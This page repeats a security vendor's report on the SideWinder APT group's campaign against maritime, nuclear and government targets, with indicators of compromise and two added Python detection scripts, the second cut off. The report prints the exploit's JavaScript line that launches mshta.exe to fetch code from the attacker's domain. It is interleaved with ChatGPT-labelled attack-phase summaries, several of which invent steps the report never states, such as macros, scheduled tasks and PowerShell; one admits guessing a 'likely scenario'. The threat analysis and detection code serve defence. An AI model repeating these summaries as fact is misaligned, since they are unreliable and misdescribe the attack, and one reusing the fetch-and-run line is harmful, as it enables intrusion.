SideWinder targets the maritime and nuclear sectors with an updated toolset


Original Text

Giampaolo Dedola

Last year, we published an article about SideWinder, a highly prolific APT group whose primary targets have been military and government entities in Pakistan, Sri Lanka, China, and Nepal. In it, we described activities that had mostly happened in the first half of the year. We tried to draw attention to the group, which was aggressively extending its activities beyond its typical targets, infecting government entities, logistics companies and maritime infrastructure in South and Southeast Asia, the Middle East, and Africa. We also shared further information about SideWinder’s post-exploitation activities and described a new sophisticated implant designed specifically for espionage.

We continued to monitor the group throughout the rest of the year, observing intense activity that included updates to SideWinder’s toolset and the creation of a massive new infrastructure to spread malware and control compromised systems. The targeted sectors were consistent with those we had seen in the first part of 2024, but we noticed a new and significant increase in attacks against maritime infrastructure and logistics companies. In 2024, we initially observed a significant number of attacks in Djibouti. Subsequently, the attackers shifted their focus to other entities in Asia and showed a strong interest in targets within Egypt. Moreover, we observed other attacks that indicated a specific interest in nuclear power plants and nuclear energy in South Asia, and a further expansion of activities into new countries, especially in Africa.

Figure: Countries and territories targeted by SideWinder in the maritime and logistics sectors in 2024

It is worth noting that SideWinder constantly works to improve its toolsets, stay ahead of security software detections, extend persistence on compromised networks, and hide its presence on infected systems. Based on our observation of the group’s activities, we presume they are constantly monitoring detections of their toolset by security solutions. Once their tools are identified, they respond by generating a new and modified version of the malware, often in under five hours. If behavioral detections occur, SideWinder tries to change the techniques used to maintain persistence and load components. Additionally, they change the names and paths of their malicious files. Thus, monitoring and detecting the group’s activities feels like a game of ping-pong.

Infection vectors

The infection pattern observed in the second part of 2024 is consistent with the one described in the previous article.

Figure: Infection flow

The attacker sends spear-phishing emails with a DOCX file attached. The document uses the remote template injection technique to download an RTF file stored on a remote server controlled by the attacker. The file exploits a known vulnerability (CVE-2017-11882) to run malicious shellcode and initiate a multi-level infection process that leads to the installation of malware we have named “Backdoor Loader”. This acts as a loader for “StealerBot”, a private post-exploitation toolkit used exclusively by SideWinder.

The documents used various themes to deceive victims into believing they are legitimate. Some documents concerned nuclear power plants and nuclear energy agencies.

Figure: Malicious documents related to nuclear power plants and energy

Many others concerned maritime infrastructure and various port authorities.

Figure: Malicious documents relating to maritime infrastructure and different port authorities

In general, the detected documents predominantly concerned governmental decisions or diplomatic issues. Most of the attacks were aimed at various national ministries and diplomatic entities. We also detected various documents that covered generic topics. For example, we found a document with information on renting a car in Bulgaria, a document expressing an intent to buy a garage, and another document offering a freelance video game developer a job working on a 3D action-adventure game called “Galactic Odyssey”.

Figure: Examples of generic malicious documents

RTF exploit

The exploit file contained shellcode, which had been updated by the attacker since our previous research, but the main goal remained the same: to run embedded JavaScript code invoking the mshtml.RunHTMLApplication function. In the new version, the embedded JavaScript runs the Windows utility mshta.exe and obtains additional code from a remote server:

javascript:eval("var gShZVnyR = new ActiveXObject('WScript.Shell');gShZVnyR.Run('mshta.exe https://dgtk.depo-govpk[.]com/19263687/trui',0);window.close();")

The newer version of the shellcode still uses certain tricks to avoid sandboxes and complicate analysis, although they differ slightly from those in past versions. It uses the GlobalMemoryStatusEx function to determine the size of RAM. It attempts to load the nlssorting.dll library and terminates execution if the operation succeeds.

JavaScript loader

The RTF exploit led to the execution of the mshta.exe Windows utility, abused to download a malicious HTA from a remote server controlled by the attacker:

mshta.exe hxxps://dgtk.depo-govpk[.]com/19263687/trui

The remote HTA embeds a heavily obfuscated JavaScript file that loads further malware, the “Downloader Module”, into memory. The JavaScript loader operates in two stages. The first stage begins execution by loading various strings, initially encoded with a substitution algorithm and stored as variables. It then checks the installed RAM and terminates if the total size is less than 950 MB. Otherwise, the previously decoded strings are used to load the second stage.

The second stage is another JavaScript file. It enumerates the subfolders at %Windows%\Microsoft.NET\Framework\ to find the version of the .NET Framework installed on the system and uses the resulting value to configure the environment variable COMPLUS_Version. Finally, the second stage decodes and loads the Downloader Module, which is embedded within its code as a base64-encoded .NET serialized stream.

Downloader Module

This component is a .NET library used to collect information about the installed security solution and download another component, the “Module Installer”. These components were already described in the previous article and will not be detailed again here.

In our latest investigation, we discovered a new version of the app.dll Downloader Module, which includes a more sophisticated function for identifying installed security solutions. In the previous version, the malware used a simple WMI query to obtain a list of installed products. The new version uses a different WMI query, which collects the name of the antivirus product and the related “productState”. Furthermore, the malware compares all running process names against an embedded dictionary. The dictionary contains 137 unique process names associated with popular security solutions. The WMI query is executed only when no Kaspersky processes are running on the system.

Backdoor Loader

The infection chain concludes with the installation of malware that we have named “Backdoor Loader”, a library consistently sideloaded using a legitimate and signed application. Its primary function is to load the “StealerBot” implant into memory. Both the “Backdoor Loader” and “StealerBot” were thoroughly described in our prior article, but the attacker has distributed numerous variants of the loader in recent months, whereas the implant has remained unchanged.

In the previous campaign, the “Backdoor Loader” library was designed to be loaded by two specific programs. For correct execution, it had to be stored on victims’ systems under one of the following names:

During the most recent campaign, the attackers tried to diversify the samples, generating many other variants distributed under the following names:

JetCfg.dll
policymanager.dll
winmm.dll
xmllite.dll
dcntel.dll
UxTheme.dll

The new malware variants feature an enhanced version of the anti-analysis code and employ Control Flow Flattening more extensively to evade detection.

During the investigation, we found a new C++ version of the “Backdoor Loader” component. The malware logic is the same as that used in the .NET variants, but the C++ version differs from the .NET implants in that it lacks anti-analysis techniques. Furthermore, most of the samples were tailored to specific targets, as they were configured to load the second stage from a specific file path embedded in the code, which also included the user’s name. Example:

C:\Users\[REDACTED]\AppData\Roaming\valgrind\[REDACTED FILE NAME].[REDACTED EXTENSION]

This indicates that these variants were likely used after the infection phase and manually deployed by the attacker within the already compromised infrastructure, after validating the victim.

Victims

SideWinder continues to attack its usual targets, especially government, military, and diplomatic entities. The targeted sectors are consistent with those observed in the past, but it is worth mentioning that the number of attacks against the maritime and logistics sectors has increased and expanded to Southeast Asia. Furthermore, we observed attacks against entities associated with nuclear energy. The following industries were also affected: telecommunications, consulting, IT service companies, real estate agencies, and hotels.

Figure: Countries and territories targeted by SideWinder in 2024

Overall, the group has further extended its activities, especially in Africa. We detected attacks in Austria, Bangladesh, Cambodia, Djibouti, Egypt, Indonesia, Mozambique, Myanmar, Nepal, Pakistan, the Philippines, Sri Lanka, the United Arab Emirates, and Vietnam. In this latest wave of attacks, SideWinder also targeted diplomatic entities in Afghanistan, Algeria, Bulgaria, China, India, the Maldives, Rwanda, Saudi Arabia, Turkey, and Uganda.

Conclusion

SideWinder is a very active and persistent actor that is constantly evolving and improving its toolkits. Its basic infection method is the use of an old Microsoft Office vulnerability, CVE-2017-11882, which once again emphasizes the critical importance of installing security patches. Despite the use of an old exploit, we should not underestimate this threat actor. In fact, SideWinder has already demonstrated its ability to compromise critical assets and high-profile entities, including those in the military and government. We know the group’s software development capabilities, which became evident when we observed how quickly they could deliver updated versions of their tools to evade detection, often within hours. Furthermore, we know that their toolset also includes advanced malware, like the sophisticated in-memory implant “StealerBot” described in our previous article. These capabilities make them a highly advanced and dangerous adversary.

To protect against such attacks, we strongly recommend maintaining a patch management process to apply security fixes (you can use solutions like Vulnerability Assessment and Patch Management and Kaspersky Vulnerability Data Feed) and using a comprehensive security solution that provides incident detection and response, as well as threat hunting. Our product line for businesses helps identify and prevent attacks of any complexity at an early stage. The campaign described in this article relies on spear-phishing emails as the initial attack vector, which highlights the importance of regular employee training and awareness programs for corporate security. We will continue to monitor the activity of this group and to update heuristic and behavioral rules for effective detection of malware.

***More information, IoCs and YARA rules for SideWinder are available to customers of the Kaspersky Intelligence Reporting Service. Contact: intelreports@kaspersky.com.

Indicators of compromise

Microsoft Office Documents
e9726519487ba9e4e5589a8a5ec2f933
d36a67468d01c4cb789cd6794fb8bc70
313f9bbe6dac3edc09fe9ac081950673
bd8043127abe3f5cfa61bd2174f54c60
e0bce049c71bc81afe172cd30be4d2b7
872c2ddf6467b1220ee83dca0e118214
3d9961991e7ae6ad2bae09c475a1bce8
a694ccdb82b061c26c35f612d68ed1c2
f42ba43f7328cbc9ce85b2482809ff1c

Backdoor Loader
0216ffc6fb679bdf4ea6ee7051213c1e
433480f7d8642076a8b3793948da5efe

Domains and IPs
pmd-office[.]info
modpak[.]info
dirctt888[.]info
modpak-info[.]services
pmd-offc[.]info
dowmloade[.]org
dirctt888[.]com
portdedjibouti[.]live
mods[.]email
dowmload[.]co
downl0ad[.]org
d0wnlaod[.]com
d0wnlaod[.]org
dirctt88[.]info
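The chain described above leaves three observable seams on the endpoint: the Equation Editor process spawning mshta.exe with a remote URL, a DLL carrying one of the Backdoor Loader file names being loaded by a host process from a user-writable directory rather than from %WINDIR%, and DNS lookups for the listed domains. The following Python is an added example written for this page (it is not Kaspersky's code and not part of the report) that runs those three checks over Sysmon-style telemetry. It assumes Sysmon field names (Image, ParentImage, CommandLine, ImageLoaded, Signed, QueryName) and event IDs 1, 7 and 22; the set of Office host processes, the Signed-field convention and the sample events are assumptions constructed for the demonstration, while the domain list is refanged from the IoC section above and the DLL names are the article's.

```python
import re

# Refanged from the IoC list above, plus the mshta staging host seen in the RTF exploit.
IOC_DOMAINS = {d.replace("[.]", ".") for d in (
    "dgtk.depo-govpk[.]com", "pmd-office[.]info", "modpak[.]info", "dirctt888[.]info",
    "modpak-info[.]services", "pmd-offc[.]info", "dowmloade[.]org", "dirctt888[.]com",
    "portdedjibouti[.]live", "mods[.]email", "dowmload[.]co", "downl0ad[.]org",
    "d0wnlaod[.]com", "d0wnlaod[.]org", "dirctt88[.]info",
)}
# File names the Backdoor Loader variants were distributed under (from the article).
SIDELOAD_NAMES = {"jetcfg.dll", "policymanager.dll", "winmm.dll",
                  "xmllite.dll", "dcntel.dll", "uxtheme.dll"}
# Assumed set of Office hosts worth watching; EQNEDT32.EXE is the Equation Editor
# process in which a CVE-2017-11882 exploit executes.
OFFICE_PARENTS = {"winword.exe", "excel.exe", "powerpnt.exe", "eqnedt32.exe"}
URL_HOST_RE = re.compile(r"https?://([^/\s'\"]+)", re.I)
WINDIR_RE = re.compile(r"^[a-z]:\\windows\\", re.I)


def basename(path):
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def is_ioc_domain(host):
    """Exact or subdomain match; a parent of a listed host (depo-govpk.com) does not match."""
    host = host.lower().rstrip(".")
    return any(host == d or host.endswith("." + d) for d in IOC_DOMAINS)


def check_event(ev):
    """Return [(rule, detail), ...] for one Sysmon-style event dict (IDs 1, 7, 22)."""
    hits = []
    if ev["EventID"] == 1:  # process creation
        image, parent = basename(ev["Image"]), basename(ev["ParentImage"])
        hosts = URL_HOST_RE.findall(ev["CommandLine"])
        if image == "mshta.exe" and parent in OFFICE_PARENTS:
            hits.append(("office_spawns_mshta", f"{parent} -> mshta.exe"))
        if image == "mshta.exe" and hosts:  # HTA fetched over the network, not a local file
            hits.append(("mshta_remote_hta", hosts[0]))
        hits += [("ioc_domain_in_cmdline", h) for h in hosts if is_ioc_domain(h)]
    elif ev["EventID"] == 7:  # image load: loader name outside %WINDIR% and unsigned
        path = ev["ImageLoaded"]
        if (basename(path) in SIDELOAD_NAMES and not WINDIR_RE.match(path)
                and str(ev.get("Signed", "false")).lower() != "true"):
            hits.append(("dll_sideload_candidate", f"{basename(ev['Image'])} loaded {path}"))
    elif ev["EventID"] == 22:  # DNS query
        if is_ioc_domain(ev["QueryName"]):
            hits.append(("ioc_dns_query", ev["QueryName"]))
    return hits


def hunt(events):
    return [(ev["EventID"], rule, detail) for ev in events for rule, detail in check_event(ev)]


# Constructed sample telemetry (not real victim data): one SideWinder-like chain plus benign noise.
SAMPLE_EVENTS = [
    {"EventID": 1, "Image": r"C:\Windows\System32\mshta.exe",
     "ParentImage": r"C:\Program Files (x86)\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE",
     "CommandLine": "mshta.exe https://dgtk.depo-govpk.com/19263687/trui"},
    {"EventID": 1, "Image": r"C:\Windows\System32\mshta.exe",
     "ParentImage": r"C:\Windows\explorer.exe",
     "CommandLine": r"mshta.exe C:\Users\alice\AppData\Local\Temp\setup.hta"},
    {"EventID": 7, "Image": r"C:\Users\alice\AppData\Roaming\Vendor\signedhost.exe",
     "ImageLoaded": r"C:\Users\alice\AppData\Roaming\Vendor\winmm.dll", "Signed": "false"},
    {"EventID": 7, "Image": r"C:\Windows\explorer.exe",
     "ImageLoaded": r"C:\Windows\System32\winmm.dll", "Signed": "true"},
    {"EventID": 22, "Image": r"C:\Windows\System32\mshta.exe", "QueryName": "dgtk.depo-govpk.com"},
    {"EventID": 22, "Image": r"C:\Program Files\Mozilla Firefox\firefox.exe", "QueryName": "www.example.com"},
]

if __name__ == "__main__":
    for event_id, rule, detail in hunt(SAMPLE_EVENTS):
        print(f"event {event_id}: {rule}: {detail}")
```

Two caveats are built into the rules. winmm.dll, xmllite.dll and UxTheme.dll are names of legitimate Windows libraries, so the sideload rule keys on the load path (outside %WINDIR%) and the missing signature, not on the file name alone; the legitimate System32 copy in the sample produces no hit. And IoC matching is directional: dgtk.depo-govpk[.]com is the listed host, so its parent domain does not match, while any subdomain of a listed domain does.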

Original Text ChatGPT 4o Paged

SideWinder targets the maritime and nuclear sectors with an updated toolset Giampaolo Dedola Last year, we published an article about SideWinder, a highly prolific APT group whose primary targets have been military and government entities in Pakistan, Sri Lanka, China, and Nepal. In it, we described activities that had mostly happened in the first half of the year. We tried to draw attention to the group, which was aggressively extending its activities beyond their typical targets, infecting government entities, logistics companies and maritime infrastructures in South and Southeast Asia, the Middle East, and Africa. We also shared further information about SideWinder’s post-exploitation activities and described a new sophisticated implant designed specifically for espionage. We continued to monitor the group throughout the rest of the year, observing intense activity that included updates to SideWinder’s toolset and the creation of a massive new infrastructure to spread malware and control compromised systems. The targeted sectors were consistent with those we had seen in the first part of 2024, but we noticed a new and significant increase in attacks against maritime infrastructures and logistics companies. In 2024, we initially observed a significant number of attacks in Djibouti. Subsequently, the attackers shifted their focus to other entities in Asia and showed a strong interest in targets within Egypt. Moreover, we observed other attacks that indicated a specific interest in nuclear power plants and nuclear energy in South Asia and further expansion of activities into new countries, especially in Africa.

Phase: Initial Access

  • Technique: Phishing via Malicious Document
  • Procedure: The attacker uses spear-phishing emails containing malicious documents designed to exploit vulnerabilities or execute macros.

Phase: Execution

  • Technique: New Sophisticated Implant
  • Procedure: Deployment of a custom implant for espionage activities, likely involving remote command execution.

Phase: Persistence

  • Technique: Scheduled Tasks or Services
  • Procedure: The implant likely uses scheduled tasks or installs as a service to maintain persistence.

Phase: Command and Control

  • Technique: Use of Massive Infrastructure
  • Procedure: Leveraging an extensive infrastructure to control compromised systems and potentially using custom encryptions or protocols for secure communication.

Phase: Impact

  • Technique: Data Collection and Exfiltration
  • Procedure: The implant collects sensitive information from compromised systems, focusing on espionage within the maritime, logistics, and nuclear sectors.

Countries and territories targeted by SideWinder in the maritime and logistics sectors in 2024 It is worth noting that SideWinder constantly works to improve its toolsets, stay ahead of security software detections, extend persistence on compromised networks, and hide its presence on infected systems. Based on our observation of the group’s activities, we presume they are constantly monitoring detections of their toolset by security solutions. Once their tools are identified, they respond by generating a new and modified version of the malware, often in under five hours. If behavioral detections occur, SideWinder tries to change the techniques used to maintain persistence and load components. Additionally, they change the names and paths of their malicious files. Thus, monitoring and detection of the group’s activities reminds us of a ping-pong game. Infection vectors The infection pattern observed in the second part of 2024 is consistent with the one described in the previous article. Infection flow The attacker sends spear-phishing emails with a DOCX file attached. The document uses the remote template injection technique to download an RTF file stored on a remote server controlled by the attacker. The file exploits a known vulnerability (CVE-2017-11882) to run a malicious

Phase: Initial Access

  • Technique: Spear-Phishing with Malicious Document
  • Procedure: The attacker sends spear-phishing emails containing a DOCX file that uses remote template injection to download an RTF file.

Phase: Execution

  • Technique: Exploitation for Client Execution
  • Procedure: The RTF file exploits a known vulnerability (CVE-2017-11882) to execute malicious code on the target system.

Phase: Defense Evasion

  • Technique: Obfuscated Files or Information
  • Procedure: SideWinder modifies their malware quickly upon detection, changing names and paths of malicious files to avoid detection.

Phase: Persistence

  • Technique: Modify Existing Services
  • Procedure: If behavioral detections occur, the group changes the techniques used to maintain persistence, potentially modifying existing system services.

Phase: Command and Control

  • Technique: Remote File Copy
  • Procedure: Implements remote template injection to download malware components from attacker-controlled servers.

Phase: Impact

  • Technique: Data Manipulation
  • Procedure: Continuous adaptation in toolset to extend persistence on compromised networks and evade detection.

shellcode and initiate a multi-level infection process that leads to the installation of malware we have named “Backdoor Loader”. This acts as a loader for “StealerBot”, a private post-exploitation toolkit used exclusively by SideWinder. The documents used various themes to deceive victims into believing they are legitimate. Some documents concerned nuclear power plants and nuclear energy agencies. Malicious documents related to nuclear power plants and energy Many others concerned maritime infrastructures and various port authorities. Malicious documents relating to maritime infrastructures and different port authorities In general, the detected documents predominantly concerned governmental decisions or diplomatic issues. Most of the attacks were aimed at various national ministries and diplomatic entities. We also detected various documents that covered generic topics. For example, we found a

Phase: Initial Access

  • Technique: Spear-Phishing via Malicious Document
  • Procedure: The attacker sends carefully themed malicious Word documents exploiting topics like nuclear energy, maritime infrastructures, and government diplomacy to deceive recipients into enabling macros.

Phase: Execution

  • Technique: Malicious Macro Execution
  • Procedure: When macros are enabled, the document executes shellcode to initiate a multi-level infection process.

Phase: Payload Deployment

  • Technique: Malware Loader Deployment
  • Procedure: The shellcode installs “Backdoor Loader,” which acts as a conduit for further payload installation.

Phase: Post-Exploitation

  • Technique: StealerBot Toolkit Deployment
  • Procedure: “Backdoor Loader” downloads and runs “StealerBot,” a private post-exploitation toolkit used for further actions on compromised systems.

Each step builds on the previous one to ensure the deployment of malicious payloads and tools with minimal detection, targeting entities of national importance.

document with information on renting a car in Bulgaria, a document expressing an intent to buy a garage, and another document offering a freelance video game developer a job working on a 3D action-adventure game called “Galactic Odyssey”. Examples of generic malicious documents RTF exploit The exploit file contained a shellcode, which had been updated by the attacker since our previous research, but the main goal remained the same: to run embedded JavaScript code invoking the mshtml.RunHTMLApplication function. In the new version, the embedded JavaScript runs the Windows utility mshta.exe and obtains additional code from a remote server: javascript:eval("var gShZVnyR = new ActiveXObject('WScript.Shell');gShZVnyR.Run('mshta.exe https://dgtk.depo-govpk[.]com/19263687/trui',0);window.close();") The newer version of the shellcode still uses certain tricks to avoid sandboxes and complicate analysis, although they differ slightly from those in past versions. It uses the GlobalMemoryStatusEx function to determine the size of RAM. It attempts to load the nlssorting.dll library and terminates execution if operation succeeds. JavaScript loader The RTF exploit led to the execution of the mshta.exe Windows utility, abused to download a malicious HTA from a remote server controlled by the attacker. mshta.exe hxxps://dgtk.depo-govpk[.]com/19263687/trui The remote HTA embeds a heavily obfuscated JavaScript file that loads further malware, the “Downloader Module”, into memory. The JavaScript loader operates in two stages. The first stage begins execution by loading various strings, initially encoded with a substitution algorithm and stored as variables. It then checks the

Phase: Initial Access

  • Technique: Malicious Document Delivery via RTF Exploit
  • Procedure: The threat actor utilizes RTF documents with embedded shellcode to deliver malicious payloads. The RTF exploit triggers embedded JavaScript code using mshtml.RunHTMLApplication.

Phase: Execution

  • Technique: mshta Abuse for Code Execution
  • Command: mshta.exe https://dgtk.depo-govpk[.]com/19263687/trui
  • Procedure: The shellcode executes this command to run the Windows utility mshta.exe, downloading a malicious HTA from a remote server.

Phase: Defense Evasion

  • Technique: Anti-Sandboxing Techniques
  • Procedure:
  • Uses GlobalMemoryStatusEx to check RAM size.
  • Attempts to load nlssorting.dll and terminates if successful. These measures aim to avoid sandbox environments and hinder analysis.

Phase: Execution (Continued)

  • Technique: Obfuscated JavaScript Execution
  • Procedure: The remote HTA contains heavily obfuscated JavaScript that downloads the next stage malware, referred to as the “Downloader Module.”

Phase: Initial Access (JavaScript Loader)

  • Technique: Obfuscated JavaScript Execution
  • Procedure: The JavaScript loader executes in stages:
  • Stage 1: Decodes strings using a substitution algorithm, stored as variables, to proceed with further loading operations.

installed RAM and terminates if the total size is less than 950 MB. Otherwise, the previously decoded strings are used to load the second stage. The second stage is another JavaScript file. It enumerates the subfolders at Windows% \Microsoft.NET\Framework\ to find the version of the .NET framework installed on the system and uses the resulting value to configure the environment variable COMPLUS_Version. Finally, the second stage decodes and loads the Downloader Module, which is embedded within its code as a base64-encoded .NET serialized stream. Downloader Module This component is a .NET library used to collect information about the installed security solution and download another component, the “Module Installer”. These components were already described in the previous article and will not be detailed again here. In our latest investigation, we discovered a new version of the app.dll Downloader Module, which includes a more sophisticated function for identifying installed security solutions. In the previous version, the malware used a simple WMI query to obtain a list of installed products. The new version uses a different WMI, which collects the name of the antivirus and the related “productState”. Furthermore, the malware compares all running process names against an embedded dictionary. The dictionary contains 137 unique process names associated with popular security solutions. The WMI query is executed only when no Kaspersky processes are running on the system. Backdoor Loader The infection chain concludes with the installation of malware that we have named “Backdoor Loader”, a library consistently sideloaded using a legitimate and signed application. Its primary function is to load the “StealerBot” implant into memory. Both the “Backdoor Loader” and “StealerBot” were thoroughly described in our prior article, but the attacker has distributed numerous variants of the loader in recent months, whereas the implant has remained unchanged. 
In the previous campaign, the “Backdoor Loader” library was designed to be loaded by two specific programs. For correct execution, it had to be stored on victims’ systems under one of the following names: During the most recent campaign, the attackers tried to diversify the samples, generating many other variants distributed under the following names: JetCfg.dll policymanager.dll winmm.dll

Phase: Reconnaissance

  • Technique: System Information Discovery
  • Procedure: Check installed RAM and terminate the process if it is less than 950 MB.
  • Method: Evaluate system resources to decide execution of further stages.

Phase: Execution

  • Technique: Environment Variable Configuration
  • Command: Enumerate subfolders in %Windows%\Microsoft.NET\Framework\ to determine the .NET framework version.
  • Procedure: Use the .NET version to configure the COMPLUS_Version environment variable for subsequent operations.

Phase: Execution

  • Technique: Base64 Decoding and Execution
  • Procedure: Decode and load a base64-encoded .NET serialized stream, executing it as the Downloader Module.

Phase: Discovery

  • Technique: Security Software Discovery
  • Procedure: Utilize WMI for gathering the name of installed antivirus software and its productState.
  • Command: Execute WMI queries for identifying security products only if Kaspersky processes are absent.

Phase: Defense Evasion

  • Technique: Process Name Comparison
  • Procedure: Compare running process names against an embedded dictionary of 137 security-related process names.

Phase: Persistence and Execution

  • Technique: DLL Sideloading
  • Procedure: Use "Backdoor Loader" library sideloaded by legitimate signed applications to load the "StealerBot" implant.
  • Note: Variants of the loader are named "JetCfg.dll", "policymanager.dll", and "winmm.dll".

xmllite.dll dcntel.dll UxTheme.dll The new malware variants feature an enhanced version of anti-analysis code and employ Control Flow Flattening more extensively to evade detection. During the investigation, we found a new C++ version of the “Backdoor Loader” component. The malware logic is the same as that used in the .NET variants, but the C++ version differs from the .NET implants in that it lacks anti-analysis techniques. Furthermore, most of the samples were tailored to specific targets, as they were configured to load the second stage from a specific file path embedded in the code, which also included the user’s name. Example: C:\Users[REDACTED]\AppData\Roaming\valgrind[REDACTED FILE NAME]. [REDACTED EXTENSION] It indicates that these variants were likely used after the infection phase and manually deployed by the attacker within the already compromised infrastructure, after validating the victim. Victims SideWinder continues to attack its usual targets, especially government, military, and diplomatic entities. The targeted sectors are consistent with those observed in the past, but it is worth mentioning that the number of attacks against the maritime and the logistics sectors has increased and expanded to Southeast Asia. Furthermore, we observed attacks against entities associated with nuclear energy. The following industries were also affected: telecommunication, consulting, IT service companies, real estate agencies, and hotels.

Phase: Delivery

  • Technique: Tailored Payload Delivery
  • Procedure: The malware is manually deployed by the attacker after the infection phase, tailored to specific targets and configured to load the second stage from specific file paths, such as C:\Users\[REDACTED]\AppData\Roaming\valgrind\[REDACTED FILE NAME].[REDACTED EXTENSION].

Phase: Defense Evasion

  • Technique: Control Flow Flattening
  • Procedure: The malware variants utilize Control Flow Flattening extensively to evade detection and complicate analysis.

Phase: Execution

  • Technique: C++ Backdoor Loader
  • Procedure: A new C++ version of a "Backdoor Loader" component is used, which lacks the anti-analysis techniques present in the .NET variants, maintaining the same core malware logic for deploying payloads.

Phase: Deployment

  • Technique: Targeted Deployment
  • Procedure: Samples are manually tailored and deployed based on embedded file paths specific to the user and environment, indicating selective targeting post-infection.

Countries and territories targeted by SideWinder in 2024 Overall, the group has further extended its activities, especially in Africa. We detected attacks in Austria, Bangladesh, Cambodia, Djibouti, Egypt, Indonesia, Mozambique, Myanmar, Nepal, Pakistan, Philippines, Sri Lanka, the United Arab Emirates, and Vietnam. In this latest wave of attacks, SideWinder also targeted diplomatic entities in Afghanistan, Algeria, Bulgaria, China, India, the Maldives, Rwanda, Saudi Arabia, Turkey, and Uganda. Conclusion SideWinder is a very active and persistent actor that is constantly evolving and improving its toolkits. Its basic infection method is the use of an old Microsoft Office vulnerability, CVE-2017-11882, which once again emphasizes the critical importance of installing security patches. Despite the use of an old exploit, we should not underestimate this threat actor. In fact, SideWinder has already demonstrated its ability to compromise critical assets and high-profile entities, including those in the military and government. We know the group’s software development capabilities, which became evident when we observed how quickly they could deliver updated versions of their tools to evade detection, often within hours. Furthermore, we know that their toolset also includes advanced malware, like the sophisticated in-memory implant “StealerBot” described in our previous article. These capabilities make them a highly advanced and dangerous adversary. To protect against such attacks, we strongly recommend maintaining a patch management process to apply security fixes (you can use solutions like Vulnerability Assessment and Patch Management and Kaspersky Vulnerability Data Feed) and using a comprehensive security solution that provides incident detection and response, as well as threat hunting. Our product line for businesses helps identify and prevent attacks of any complexity at an early stage. 
The campaign described in this article relies on spear-phishing emails as the initial attack vector, which highlights the importance of regular employee training and awareness programs for corporate security. We will continue to monitor the activity of this group and to update heuristic and behavioral rules for effective detection of malware.

More information, IoCs and YARA rules for SideWinder are available to customers of the Kaspersky Intelligence Reporting Service. Contact: intelreports@kaspersky.com.

Indicators of compromise

Microsoft Office Documents
e9726519487ba9e4e5589a8a5ec2f933
d36a67468d01c4cb789cd6794fb8bc70
313f9bbe6dac3edc09fe9ac081950673
bd8043127abe3f5cfa61bd2174f54c60
e0bce049c71bc81afe172cd30be4d2b7
872c2ddf6467b1220ee83dca0e118214
3d9961991e7ae6ad2bae09c475a1bce8
a694ccdb82b061c26c35f612d68ed1c2
f42ba43f7328cbc9ce85b2482809ff1c

Backdoor Loader
0216ffc6fb679bdf4ea6ee7051213c1e
433480f7d8642076a8b3793948da5efe

Domains and IPs
pmd-office[.]info
modpak[.]info
dirctt888[.]info
modpak-info[.]services
pmd-offc[.]info
dowmloade[.]org
dirctt888[.]com
portdedjibouti[.]live
mods[.]email
dowmload[.]co
downl0ad[.]org
d0wnlaod[.]com
d0wnlaod[.]org
dirctt88[.]info

ChatGPT paged

Phase: Initial Access

  • Technique: Spear-Phishing with Malicious Document
  • Procedure: Delivery of spear-phishing emails containing a malicious Microsoft Office document exploiting CVE-2017-11882.

Phase: Execution

  • Technique: Exploitation for Client Execution
  • Procedure: Exploit Microsoft Office vulnerability (CVE-2017-11882) to execute code upon opening the malicious document.

Phase: Implant Deployment

  • Technique: In-Memory Implant
  • Tool/Program: Deployment of advanced malware such as "StealerBot" directly in-memory to avoid detection and persist on the system.

Phase: Evasion

  • Technique: Software Update and Evasion
  • Procedure: Rapid updates to malware toolsets to evade detection, demonstrating advanced software development capabilities.

Phase: Persistence

  • Technique: Persistence through In-Memory Execution
  • Procedure: Utilize in-memory implant techniques to maintain persistence without writing to disk, reducing traces.

Phase: Reconnaissance

  • Technique: Use of In-Memory Tools
  • Procedure: Gather information on the compromised network using in-memory tools to avoid triggering traditional detection mechanisms.

Phase: Impact

  • Technique: Data Exfiltration and Compromise of Assets
  • Procedure: Target critical and high-profile assets, including military and government entities, for sensitive data exfiltration.

These procedures highlight SideWinder's advanced capabilities in exploiting vulnerabilities and utilizing sophisticated techniques to avoid detection, making them a significant threat.

The provided text primarily consists of IOCs and does not contain specific command lines or executable tools used by a threat actor. Therefore, there are no detailed TTPs to extract. I'll provide a likely scenario based on common attack methods associated with similar contexts.

Phase: Initial Access

  • Technique: Phishing via Malicious Document
  • Procedure: Attacker sends a spear-phishing email containing a malicious Microsoft Office document with embedded macros.

Phase: Execution

  • Technique: Execution via Office Application
  • Inferred Procedure: Enabled macros execute PowerShell or other scripts to download additional payloads.

Phase: Persistence

  • Technique: Backdoor Installation
  • Inferred Procedure: Deployment of backdoor loader to maintain access.

Phase: Command and Control

  • Technique: Remote Command Execution
  • Inferred Procedure: Use of a backdoor to communicate with command and control servers (domains mentioned).

These inferred procedures reflect typical tactics used in similar attack scenarios, which would involve phishing to gain initial access and scripts for further compromise.
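The report's indicator section gives file hashes and defanged domains but nothing that acts on them. The following is an added example, not code from the Kaspersky report or from any of the model outputs on this page: it refangs the listed domains, then sweeps a handful of constructed DNS, proxy and AV log lines for both the domains and the MD5 hashes. Only the hashes and domains come from the report; the log lines, client IPs and file path are constructed, and the matching deliberately distinguishes a real subdomain (www.modpak.info) from a look-alike suffix (notdirctt888.info), which a plain substring search would get wrong.

```python
"""
Sweep constructed DNS, proxy and AV log lines for the SideWinder indicators
listed in the report's "Indicators of compromise" section.

Added example, not code from the Kaspersky report or from any of the model
outputs on this page. Only the hashes and domains come from the report; the
log lines, IP addresses and file path are constructed for illustration.
"""
import re

# Domains exactly as the report lists them, defanged with "[.]".
DEFANGED_DOMAINS = [
    "pmd-office[.]info", "modpak[.]info", "dirctt888[.]info",
    "modpak-info[.]services", "pmd-offc[.]info", "dowmloade[.]org",
    "dirctt888[.]com", "portdedjibouti[.]live", "mods[.]email",
    "dowmload[.]co", "downl0ad[.]org", "d0wnlaod[.]com",
    "d0wnlaod[.]org", "dirctt88[.]info",
]

# MD5 hashes from the report, grouped as the report groups them.
DOCUMENT_MD5 = {
    "e9726519487ba9e4e5589a8a5ec2f933", "d36a67468d01c4cb789cd6794fb8bc70",
    "313f9bbe6dac3edc09fe9ac081950673", "bd8043127abe3f5cfa61bd2174f54c60",
    "e0bce049c71bc81afe172cd30be4d2b7", "872c2ddf6467b1220ee83dca0e118214",
    "3d9961991e7ae6ad2bae09c475a1bce8", "a694ccdb82b061c26c35f612d68ed1c2",
    "f42ba43f7328cbc9ce85b2482809ff1c",
}
LOADER_MD5 = {
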